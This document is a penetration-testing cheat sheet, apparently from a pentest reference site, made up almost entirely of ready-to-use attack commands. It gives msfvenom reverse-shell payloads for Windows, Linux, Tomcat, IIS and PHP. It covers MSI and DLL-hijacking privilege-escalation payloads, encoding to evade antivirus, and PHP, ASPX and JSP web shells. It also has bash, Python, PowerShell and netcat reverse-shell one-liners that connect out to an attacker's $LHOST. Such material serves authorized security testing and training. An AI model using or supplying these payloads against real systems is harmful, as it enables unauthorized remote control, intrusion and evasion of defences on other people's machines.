🧪 Payload Generation

msfvenom payloads, web shells, and reverse shell one-liners.


MSFVENOM

Windows reverse shell (staged)

Staged payload — Smaller size, requires meterpreter handler

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe

Windows reverse shell (stageless)

Self-contained payload — Works with nc listener, more reliable

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe

Linux reverse shell

ELF binary — chmod +x and execute

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f elf -o shell.elf

Java WAR (Tomcat)

Deploy via Tomcat manager — JSP reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f war -o shell.war

ASP/ASPX (IIS)

Upload to IIS web root — Windows web servers

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f aspx -o shell.aspx

PHP reverse shell

Upload or inject — Most common web shell format

msfvenom -p php/reverse_php LHOST=$LHOST LPORT=4444 -o shell.php

MSI installer (AlwaysInstallElevated)

Abuse misconfigured Windows policy — Runs as SYSTEM

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f msi -o shell.msi
# On target: msiexec /quiet /qn /i shell.msi

DLL hijacking payload

Replace a DLL the service loads — Runs as service account

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o hijack.dll

Encoding to bypass basic AV

Shikata_ga_nai encoder — Multiple iterations

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

WEB SHELLS

PHP one-liner

Simplest possible web shell — Upload or inject

<?php system($_GET['cmd']); ?>

PHP reverse shell (Pentest Monkey)

Full interactive reverse shell — Most reliable PHP shell

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Edit LHOST and LPORT in the file
# Upload and visit the URL to trigger

ASPX web shell

For IIS servers — Upload to web root

<%@ Page Language="C#" %><%Response.Write(new System.Diagnostics.Process(){StartInfo=new System.Diagnostics.ProcessStartInfo("cmd","/c "+Request["cmd"]){RedirectStandardOutput=true,UseShellExecute=false}}.Start().StandardOutput.ReadToEnd());%>

JSP web shell

For Tomcat/Java servers — Deploy as WAR or upload directly

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

REVERSE SHELL ONE-LINERS

Bash

Most reliable on Linux — Try this first

bash -i >& /dev/tcp/$LHOST/4444 0>&1

Python

Available on most Linux systems — Python 2 or 3

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("$LHOST",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

PowerShell

Windows reverse shell — Encode to bypass restrictions

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$LHOST',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Netcat (with -e)

If nc has -e flag — Simple and reliable

nc -e /bin/bash $LHOST 4444

Netcat (without -e)

FIFO pipe method — Works when nc doesn't have -e

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $LHOST 4444 >/tmp/f

SHELL UPGRADES

Upgrade to interactive TTY

First thing after catching a shell — Gives tab complete, Ctrl+C safety

python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then Ctrl+Z to background
stty raw -echo; fg
export TERM=xterm